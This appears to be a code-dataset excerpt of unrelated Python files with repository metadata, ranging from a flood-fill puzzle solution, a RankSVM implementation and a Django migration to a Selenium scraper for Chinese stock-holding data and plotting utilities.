    prop._addConstant("service-not-supported", "service-not-supported", 524288)
    prop._addConstant("service-protocol-error", "service-protocol-error", 2097152)
    prop._addConstant("service-unavailable", "service-unavailable", 1048576)
    prop._addConstant("sw-defect", "sw-defect", 128)
    prop._addConstant("task-reset", "task-reset", 268435456)
    prop._addConstant("timeout", "timeout", 8)
    prop._addConstant("unidentified-fail", "unidentified-fail", 2)
    meta.props.add("invRslt", prop)

    prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "local"
    prop._addConstant("implicit", "implicit", 4)
    prop._addConstant("local", "local", 0)
    prop._addConstant("policy", "policy", 1)
    prop._addConstant("replica", "replica", 2)
    prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
    meta.props.add("lcOwn", prop)

    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)

    prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR)
    prop.label = "Subject DN"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("oDn", prop)

    # Task completion state machine values.
    prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR)
    prop.label = "Completion"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "scheduled"
    prop._addConstant("cancelled", "cancelled", 3)
    prop._addConstant("completed", "completed", 2)
    prop._addConstant("crashsuspect", "crash-suspect", 7)
    prop._addConstant("failed", "failed", 4)
    prop._addConstant("indeterminate", "indeterminate", 5)
    prop._addConstant("processing", "processing", 1)
    prop._addConstant("ready", "ready", 8)
    prop._addConstant("scheduled", "scheduled", 0)
    prop._addConstant("suspended", "suspended", 6)
    meta.props.add("operSt", prop)

    prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = False
    prop.defaultValueStr = "no"
    prop._addConstant("no", None, False)
    prop._addConstant("yes", None, True)
    meta.props.add("originMinority", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR)
    prop.label = "ID"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("runId", prop)

    prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("startTs", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR)
    prop.label = "Try"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("try", prop)

    prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("ts", prop)

    meta.namingProps.append(getattr(meta.props, "id"))

    def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
        # `id` is the naming property (see rnFormat above).
        namingVals = [id]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
2157f5ad78c10962340a58bdd733a32257639f36 | 6e3d061f94468905841a918278a352d4e5df89a1 | /hashicorp_vault_client/test/test_body70.py | 4abc0cc541b05ec6a2c886617b334da9410acb06 | [
"Apache-2.0"
] | permissive | drewmullen/HAC | 179a4188e6e6ce3a36d480e45f238fd0901a710f | fb185804fd244366f8f8d01df22835b3d96e7512 | refs/heads/master | 2020-08-03T12:13:08.785915 | 2019-10-03T18:33:04 | 2019-10-03T18:33:04 | 211,749,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from models.body70 import Body70 # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestBody70(unittest.TestCase):
"""Body70 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testBody70(self):
"""Test Body70"""
# FIXME: construct object with mandatory attributes with example values
# model = hashicorp_vault_client.models.body70.Body70() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"drew@nebulaworks.com"
] | drew@nebulaworks.com |
bc31123ae5db9b82f65e97d1036afeff59cb28f4 | 5af41b5507a535cc228673f05c5da215c93a76b5 | /practice/puzzles/medium/Flood fill Example.py | 79d3877a13788695f417bc1a52f1ef3d83e793f1 | [] | no_license | mithrantir/CodinGame | d308f50f3d74bb105e678d0b66e439c68b07f9a1 | 306ead31859b3b499019adadbdd41631781ad192 | refs/heads/master | 2022-07-14T20:41:05.380179 | 2020-05-17T21:15:15 | 2020-05-17T21:15:15 | 259,610,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,169 | py |
with open('000.txt') as f:
read_data = f.read().split('\n')
w = int(read_data[0])
h = int(read_data[1])
# w = int(input())
# h = int(input())
alderaan = []
for i in range(h):
# alderaan.append([c for c in input()])
alderaan.append([c for c in read_data[2+i]])
tower = {}
for i in range(h):
for j in range(w):
if alderaan[i][j] != '.' and alderaan[i][j] != '#':
tower[(i, j)] = [[i, j]]
expand = True
while expand:
exp_points = {}
for (tx, ty) in tower:
tow_exp = []
for i, j in tower[(tx, ty)]:
if i > 0 and alderaan[i - 1][j] == '.':
tow_exp.append([i - 1, j])
if (i - 1, j) in exp_points and exp_points[(i - 1, j)][1] != [tx, ty]:
exp_points[(i - 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i - 1, j)] = [alderaan[tx][ty], [tx, ty]]
if i < h - 1 and alderaan[i + 1][j] == '.':
tow_exp.append([i + 1, j])
if (i + 1, j) in exp_points and exp_points[(i + 1, j)][1] != [tx, ty]:
exp_points[(i + 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i + 1, j)] = [alderaan[tx][ty], [tx, ty]]
if j > 0 and alderaan[i][j - 1] == '.':
tow_exp.append([i, j - 1])
if (i, j - 1) in exp_points and exp_points[(i, j - 1)][1] != [tx, ty]:
exp_points[(i, j - 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j - 1)] = [alderaan[tx][ty], [tx, ty]]
if j < w - 1 and alderaan[i][j + 1] == '.':
tow_exp.append([i, j + 1])
if (i, j + 1) in exp_points and exp_points[(i, j + 1)][1] != [tx, ty]:
exp_points[(i, j + 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j + 1)] = [alderaan[tx][ty], [tx, ty]]
tower[(tx, ty)] = tow_exp
if len(exp_points) == 0:
expand = False
else:
for (i, j) in exp_points:
alderaan[i][j] = exp_points[(i, j)][0]
for i in range(h):
print("".join(c for c in alderaan[i]))
| [
"christophoros.mouratidis@gmail.com"
] | christophoros.mouratidis@gmail.com |
9a7925334b208a1c4ede6feb518cced7303356b4 | fb0018545b1f0646a59a51522fd32ccbaf4c0bb7 | /py/escher/tests/test_urls.py | 1fd5806a34e1380e1a858f5be0f0e0a1b333f9ad | [
"MIT"
] | permissive | DD-DeCaF/escher | 083341268dad2195b402ae80391eb93e54b88365 | cd2c81bc62199f9349a9f24dd7a0a148fa6adc46 | refs/heads/master | 2022-07-24T18:49:55.835648 | 2020-02-15T14:48:52 | 2020-02-15T14:51:22 | 84,944,610 | 1 | 0 | NOASSERTION | 2018-10-08T08:50:49 | 2017-03-14T12:06:53 | JavaScript | UTF-8 | Python | false | false | 887 | py | from escher.urls import (
get_url,
get_filepath,
root_directory,
)
from escher.version import (
__version__,
__schema_version__,
__map_model_version__,
)
from os.path import join, exists
from pytest import raises
def test_online():
url = get_url('escher')
assert url == 'https://unpkg.com/escher@%s/dist/escher.js' % __version__
def test_local():
assert exists(get_filepath('map_jsonschema'))
def test_index_url():
url = get_url('server_index')
assert url == ('https://escher.github.io/%s/%s/index.json' %
(__schema_version__, __map_model_version__))
def test_map_download_url():
url = get_url('map_download')
assert url == ('https://escher.github.io/%s/%s/maps/' %
(__schema_version__, __map_model_version__))
def test_bad_url():
with raises(Exception):
get_url('bad-name')
| [
"zaking17@gmail.com"
] | zaking17@gmail.com |
d2309b65fbdf81233c3fec89a1b2055bfd35d8cb | d8761daf7bf2b75b9925b12450da2a6ea3d31140 | /tlbo/utils/rank_svm.py | c29c536605ebe543d3a59c20d0899f65957ca633 | [] | no_license | pyz2020/efficient-tlbo-DL-Model-Reoptimizations | 5dcc2c522d9430b4fab534689fd338fbfc6a6945 | dd2ed9c91b970e0ab4c0ed82382567ec0df6c42b | refs/heads/master | 2023-01-06T18:33:33.726527 | 2020-11-04T08:09:13 | 2020-11-04T08:09:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | import itertools
import numpy as np
from scipy import stats
from sklearn import svm, linear_model, model_selection
def transform_pairwise(X, y):
"""Transforms data into pairs with balanced labels for ranking
Transforms a n-class ranking problem into a two-class classification
problem. Subclasses implementing particular strategies for choosing
pairs should override this method.
In this method, all pairs are choosen, except for those that have the
same target value. The output is an array of balanced classes, i.e.
there are the same number of -1 as +1
Parameters
----------
X : array, shape (n_samples, n_features)
The data
y : array, shape (n_samples,) or (n_samples, 2)
Target labels. If it's a 2D array, the second column represents
the grouping of samples, i.e., samples with different groups will
not be considered.
Returns
-------
X_trans : array, shape (k, n_feaures)
Data as pairs
y_trans : array, shape (k,)
Output class labels, where classes have values {-1, +1}
"""
X_new = []
y_new = []
y = np.asarray(y)
if y.ndim == 1:
y = np.c_[y, np.ones(y.shape[0])]
comb = itertools.combinations(range(X.shape[0]), 2)
for k, (i, j) in enumerate(comb):
if y[i, 0] == y[j, 0] or y[i, 1] != y[j, 1]:
# skip if same target or different group
continue
X_new.append(X[i] - X[j])
y_new.append(np.sign(y[i, 0] - y[j, 0]))
# output balanced classes
if y_new[-1] != (-1) ** k:
y_new[-1] = - y_new[-1]
X_new[-1] = - X_new[-1]
return np.asarray(X_new), np.asarray(y_new).ravel()
class RankSVM(object):
"""Performs pairwise ranking with an underlying LinearSVC model
Input should be a n-class ranking problem, this object will convert it
into a two-class classification problem, a setting known as
`pairwise ranking`.
See object :ref:`svm.LinearSVC` for a full description of parameters.
"""
def __init__(self):
self.clf = svm.SVC(kernel='linear', C=.1)
self.coef = None
def fit(self, X, y):
"""
Fit a pairwise ranking model.
Parameters
----------
X : array, shape (n_samples, n_features)
y : array, shape (n_samples,) or (n_samples, 2)
Returns
-------
self
"""
X_trans, y_trans = transform_pairwise(X, y)
self.clf.fit(X_trans, y_trans)
self.coef = self.clf.coef_.ravel() / np.linalg.norm(self.clf.coef_)
def predict(self, X):
if self.coef is not None:
return np.dot(X, self.coef)
else:
raise ValueError("Must call fit() prior to predict()")
def score(self, X, y):
print(np.dot(X, self.coef).shape)
print(y.shape)
tau, _ = stats.kendalltau(np.dot(X, self.coef), y)
return tau
if __name__ == '__main__':
# as showcase, we will create some non-linear data
# and print the performance of ranking vs linear regression
np.random.seed(1)
n_samples, n_features = 300, 5
true_coef = np.random.randn(n_features)
X = np.random.randn(n_samples, n_features)
noise = np.random.randn(n_samples) / np.linalg.norm(true_coef)
y = np.dot(X, true_coef)
y = np.arctan(y) # add non-linearities
y += .1 * noise # add noise
Y = np.c_[y, np.mod(np.arange(n_samples), 5)] # add query fake id
kf = model_selection.KFold(n_splits=5, shuffle=True)
# cv = model_selection.KFold(n_samples, 5)
train, test = list(iter(kf))[-1]
# make a simple plot out of it
# import pylab as pl
# pl.scatter(np.dot(X, true_coef), y)
# pl.title('Data to be learned')
# pl.xlabel('<X, coef>')
# pl.ylabel('y')
# pl.show()
# print the performance of ranking
rank_svm = RankSVM()
rank_svm.fit(X[train], Y[train])
print('Performance of ranking ', rank_svm.score(X[test], Y[test][:, 0]))
# print(rank_svm.predict(X[test]))
# and that of linear regression
ridge = linear_model.RidgeCV(fit_intercept=True)
ridge.fit(X[train], y[train])
# X_test_trans, y_test_trans = transform_pairwise(X[test], y[test])
# score = np.mean(np.sign(np.dot(X_test_trans, ridge.coef_)) == y_test_trans)
score, _ = stats.kendalltau(np.dot(X[test], ridge.coef_), Y[test][:, 0])
print('Performance of linear regression ', score)
| [
"1225646303@qq.com"
] | 1225646303@qq.com |
82575ef7f307733145700be6a98b158fd12278da | d0d1e07c984651f96bd9386d546c85c0341e46b2 | /scripts/kivy_experiments/importing/wombat2.py | 17307767b7aa1edc3ac0fe22fb3bb81f93eacf4a | [
"MIT"
] | permissive | timedata-org/timedata | 61cde905b1fe9eb60ac83ecbf5a5a2114793c45d | 3faac7450678aaccd4a283d0d41ca3e7f113f51b | refs/heads/master | 2020-04-11T12:03:57.962646 | 2019-06-09T10:05:16 | 2019-06-09T10:05:52 | 51,217,217 | 5 | 3 | null | 2016-09-18T16:20:43 | 2016-02-06T19:13:43 | C++ | UTF-8 | Python | false | false | 173 | py | from kivy.uix.label import Label
class Wombat2(Label):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
print('wombat2 constructed')
| [
"tom@swirly.com"
] | tom@swirly.com |
4ed252d7f3459a256fba7d6f46a04fdc456dec6c | 3d50f97420e7aa79be37cc238555ef2038064afb | /stocks/tests/models/test_HSGTCGHold.py | 5bc7b08ac0cbc7b9c39c326e5fcb5beff4924753 | [
"MIT"
] | permissive | tauruswang/wanggeService | d6948704f5e28c1603e864e32986cc91eaf816b2 | 7aa6687ece9a865930c5dbab506cad5955848457 | refs/heads/master | 2020-03-19T05:52:36.264023 | 2018-06-01T03:32:27 | 2018-06-01T03:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,490 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_HSGTCGHold.py
Description :
@Author : pchaos
date: 2018-5-31
-------------------------------------------------
Change Activity:
18-5-31:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import HSGTCGHold
import selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
import re
import pandas as pd
import numpy as np
import datetime, time
__author__ = 'pchaos'
class TestHSGTCGHold(TestCase):
def test_stockstatistics(self):
""" 北持股向市值大于八千万
:return:
"""
browser = webdriver.Firefox()
browser.maximize_window()
try:
results = []
pages = range(1, 37, 1)
pages = range(1, 250, 1) # 30日市值排序
url = 'http://data.eastmoney.com/hsgtcg/StockStatistics.aspx'
browser.get(url)
# 北向持股
browser.find_element_by_css_selector('.border_left_1').click()
time.sleep(2)
# 市值排序
browser.find_element_by_css_selector(
'#tb_ggtj > thead:nth-child(1) > tr:nth-child(1) > th:nth-child(8)').click()
time.sleep(1.5)
for page in pages:
soup = BeautifulSoup(browser.page_source, 'lxml')
table = soup.find_all(id='tb_ggtj')[0]
df = pd.read_html(str(table), header=1)[0]
df.columns = ['tradedate', 'code', 'name', 'a1', 'close', 'zd', 'hvol', 'hamount', 'hpercent', 'oneday',
'fiveday',
'tenday']
# 修复code长度,前补零
df['code'] = df.code.astype(str)
df['code'] = df['code'].apply(lambda x: x.zfill(6))
# 修复持股数量
df['hvol'] = df['hvol'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
df['hamount'] = df['hamount'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
# 删除多余的列
del df['oneday']
del df['fiveday']
del df['tenday']
del df['a1']
results.append(df[df['hamount'] >= 8000])
if len(df[df['hamount'] < 8000]):
# 持股金额小于
break
else:
# 下一页
t = browser.find_element_by_css_selector('#PageContgopage')
t.clear()
t.send_keys(str(page + 1))
btnenable = True
while btnenable:
try:
btn=browser.find_element_by_css_selector('.btn_link')
btn.click()
btnenable =False
except Exception as e:
print('not ready click. Waiting')
time.sleep(0.1)
time.sleep(1.5)
# print(df)
print('results\n{}'.format(results))
finally:
if browser:
browser.close()
self.assertTrue(len(results) > 3)
# results 整合
dfn = pd.DataFrame()
for dfa in results:
dfn = pd.concat([dfn, dfa])
dfn.reset_index(drop=True, inplace=True)
self.assertFalse(dfn[['code', 'tradedate']] is None)
df = dfn[['code', 'tradedate']]
# 去除重复数据
df = df[~df.duplicated()]
# pandas dataframe save to model
HSGTCGHold.objects.bulk_create(
HSGTCGHold(**vals) for vals in df[['code', 'tradedate']].to_dict('records')
)
self.assertTrue(HSGTCGHold.getlist().count() > 0, '北向持股大于七千万的股票数量大于0')
print(HSGTCGHold.getlist())
def test_importList(self):
HSGTCGHold.importList()
hsg = HSGTCGHold.getlist(tradedate=datetime.datetime.now().date() - datetime.timedelta(1))
self.assertTrue(hsg.count() > 10 , '北向持股大于七千万的股票数量大于10, 实际数量:{}'.format(hsg.count()))
self.assertTrue(isinstance(hsg[0].tradedate, datetime.date))
| [
"drifthua@gmail.com"
] | drifthua@gmail.com |
d493fdc54449949f63febe3288ddf68ef1dfc048 | 2a948e27dc09d99090d09472f488e4a6224db621 | /main.py | 0f689793f528e5f7b5094863b68b81662992f154 | [] | no_license | hristo-grudev/expobankrs | a88da6f12f48f0f3705f08c66da1fa11132defdc | df935b0d28af115cc575d122870f80b4c4d0df82 | refs/heads/main | 2023-03-25T11:54:13.042713 | 2021-03-08T13:49:51 | 2021-03-08T13:49:51 | 345,671,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | from scrapy import cmdline
cmdline.execute("scrapy crawl expobankrs".split()) | [
"hr.grudev@gmail.com"
] | hr.grudev@gmail.com |
0417c2835eac339494cbb1098e8e8fd018780afa | 8d86f0d90a36b97903d07455edb37611a6958832 | /Apps/users/migrations/0001_initial.py | d7bdc634de207e4003b00c5aec1e4d014aaca00a | [] | no_license | urimeba/diagnosticapp | 4615232224e61e513dcce6557197eeca9b9ece86 | 311bdadabe6c2883c6d7395963cd23c3d7ebca03 | refs/heads/main | 2023-01-21T07:48:04.510799 | 2020-11-30T21:28:21 | 2020-11-30T21:28:21 | 313,359,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | # Generated by Django 3.1.3 on 2020-11-23 19:29
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('genero', models.CharField(choices=[('H', 'Hombre'), ('M', 'Mujer')], max_length=1, null=True, verbose_name='Genero')),
('edad', models.PositiveIntegerField(null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'Usuarios',
'ordering': ['id'],
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"urimeba511@gmail.com"
] | urimeba511@gmail.com |
7bb83d0baa185fe756143ee095e6f0fecca1c70b | dafafb8f65cd93dd1f6567d9b8e431e31f19ae68 | /dms/views/apply/music.py | de272d9f96fe77147c3b2527b8dad48277fe174a | [
"MIT"
] | permissive | SangminOut/DMS-Sanic | 7fb877b2a772de808b7391428e151b2a2645c59d | bbb65c584711fa23dbf0455300307c2acceba013 | refs/heads/master | 2020-06-15T06:11:33.116199 | 2019-07-14T12:57:11 | 2019-07-14T12:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from sanic.request import Request
from sanic.views import HTTPMethodView
class MusicApplyView(HTTPMethodView):
def get(self, request: Request, weekday: int):
"""
Response Music Apply Status
"""
pass
def post(self, request: Request, weekday: int):
"""
Apply Music
"""
pass
def delete(self, request: Request, weekday: int):
"""
Delete Music apply on the weekday
"""
pass
| [
"python@istruly.sexy"
] | python@istruly.sexy |
24430bb2f438aace2477e6ae54cfe4c876848f5c | 4dd695521343d56ff943e8c1768343d7680714e3 | /experiments/scripts_auto_closedset_ynoguti/config_SVM_128_fold10.py | f5343d3ddb38f0516fe592dabbc19c413e186cf9 | [] | no_license | natharb/environment | ea659ee541f6473e92b5b30c549e52b66f47b280 | 86e6cee6e01d2370abeb7c55a2c8a15001735919 | refs/heads/master | 2021-09-28T02:39:02.222966 | 2018-11-13T12:03:34 | 2018-11-13T12:03:34 | 139,762,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
temp_directory = './results/closedset_ynoguti/SVM/128/fold_10/temp/'
result_directory = './results/closedset_ynoguti/SVM/128/fold_10/results/'
sub_directory = 'subdirectory'
database = 'database_SVM_128_fold10.py'
groups = ['dev']
#groups = ['dev', 'eval']
preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
algorithm = bob.bio.gmm.algorithm.SVMGMM(number_of_gaussians = 128, kmeans_training_iterations = 10, gmm_training_iterations = 10,
training_threshold = 5e-4, variance_threshold = 5e-4, update_weights = True, update_means = True, update_variances = True, relevance_factor = 4, gmm_enroll_iterations = 1, responsibility_threshold = 0, INIT_SEED = 5489)
#parallel = 40
#verbose = 2 | [
"nathbapt@decom.fee.unicamp.br"
] | nathbapt@decom.fee.unicamp.br |
de9de4589510affd0dcae62be57fd19a0178ca96 | 2baf095631192604a2aabdeeb2aa230b4229076c | /benchmark/plot.py | ce577c556d017b0073c4627b5c3a452d4c50a29d | [] | no_license | ximitiejiang/machine_learning_algorithm | 14ea7cf991381375b6cbe34030a477e6a949abe1 | a26c64a561985444c1fc23db4ab298af255d1177 | refs/heads/master | 2020-03-26T23:02:10.614960 | 2019-12-05T14:54:49 | 2019-12-05T14:54:49 | 145,505,075 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,736 | py | import progressbar
#from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib.cm as cmx
import matplotlib.colors as colors
import numpy as np
#from mlfromscratch.utils.data_operation import calculate_covariance_matrix
#from mlfromscratch.utils.data_operation import calculate_correlation_matrix
#from mlfromscratch.utils.data_manipulation import standardize
bar_widgets = [
'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"),
' ', progressbar.ETA()
]
def calculate_variance(X): # 计算方差
""" Return the variance of the features in dataset X """
mean = np.ones(np.shape(X)) * X.mean(0)
n_samples = np.shape(X)[0]
variance = (1 / n_samples) * np.diag((X - mean).T.dot(X - mean))
return variance
def calculate_std_dev(X): # 计算标准差
""" Calculate the standard deviations of the features in dataset X """
std_dev = np.sqrt(calculate_variance(X))
return std_dev
def standardize(X): # 标准化
""" Standardize the dataset X """
X_std = X
mean = X.mean(axis=0)
std = X.std(axis=0)
for col in range(np.shape(X)[1]):
if std[col]:
X_std[:, col] = (X_std[:, col] - mean[col]) / std[col]
# X_std = (X - X.mean(axis=0)) / X.std(axis=0)
return X_std
def calculate_covariance_matrix(X, Y=None): # 计算协方差矩阵
""" Calculate the covariance matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance_matrix = (1 / (n_samples-1)) * (X - X.mean(axis=0)).T.dot(Y - Y.mean(axis=0))
return np.array(covariance_matrix, dtype=float)
def calculate_correlation_matrix(X, Y=None): # 计算相关系数矩阵
""" Calculate the correlation matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0))
std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T))
return np.array(correlation_matrix, dtype=float)
class Plot():
def __init__(self):
self.cmap = plt.get_cmap('viridis')
def _transform(self, X, dim):
covariance = calculate_covariance_matrix(X) # 计算协方差covariance
eigenvalues, eigenvectors = np.linalg.eig(covariance) # 计算协方差矩阵的特征值eigenvalues和特征向量eigenvectors
# Sort eigenvalues and eigenvector by largest eigenvalues
idx = eigenvalues.argsort()[::-1] #对特征值从大到小排序
eigenvalues = eigenvalues[idx][:dim] #提取前dim个特征值
eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim] # 提取特征值对应特征向量
# Project the data onto principal components
X_transformed = X.dot(eigenvectors) # X*eigenvectors 特征乘以特征向量
return X_transformed
def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend={"type": "lines", "loc": "lower right"}):
if scatter:
scatter_plots = scatter_labels = []
for s in scatter:
scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])]
scatter_labels += [s["label"]]
scatter_plots = tuple(scatter_plots)
scatter_labels = tuple(scatter_labels)
for l in lines:
li = plt.plot(l["x"], l["y"], color=s["color"], linewidth=l["width"], label=l["label"])
if mse:
plt.suptitle(title)
plt.title("MSE: %.2f" % mse, fontsize=10)
else:
plt.title(title)
if axis_labels:
plt.xlabel(axis_labels["x"])
plt.ylabel(axis_labels["y"])
if legend["type"] == "lines":
plt.legend(loc="lower_left")
elif legend["type"] == "scatter" and scatter:
plt.legend(scatter_plots, scatter_labels, loc=legend["loc"])
plt.show()
# Plot the dataset X and the corresponding labels y in 2D using PCA.
def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None):
X_transformed = self._transform(X, dim=2)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
class_distr = []
y = np.array(y).astype(int)
colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))]
# Plot the different class distributions
for i, l in enumerate(np.unique(y)):
_x1 = x1[y == l]
_x2 = x2[y == l]
_y = y[y == l]
class_distr.append(plt.scatter(_x1, _x2, color=colors[i]))
# Plot legend
if not legend_labels is None:
plt.legend(class_distr, legend_labels, loc=1)
# Plot title
if title:
if accuracy:
perc = 100 * accuracy
plt.suptitle(title)
plt.title("Accuracy: %.1f%%" % perc, fontsize=10)
else:
plt.title(title)
# Axis labels
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.show()
# Plot the dataset X and the corresponding labels y in 3D using PCA.
def plot_in_3d(self, X, y=None):
X_transformed = self._transform(X, dim=3)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
x3 = X_transformed[:, 2]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x1, x2, x3, c=y)
plt.show()
| [
"ximitiejiang@163.com"
] | ximitiejiang@163.com |
7fa07c81e77c3c7452bffd7ef527182c0b399ad3 | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/do/host_internet_scsi_hba_authentication_capabilities.py | c35666aac4c0338cccda1bb6bc8f959b7d9f3d45 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
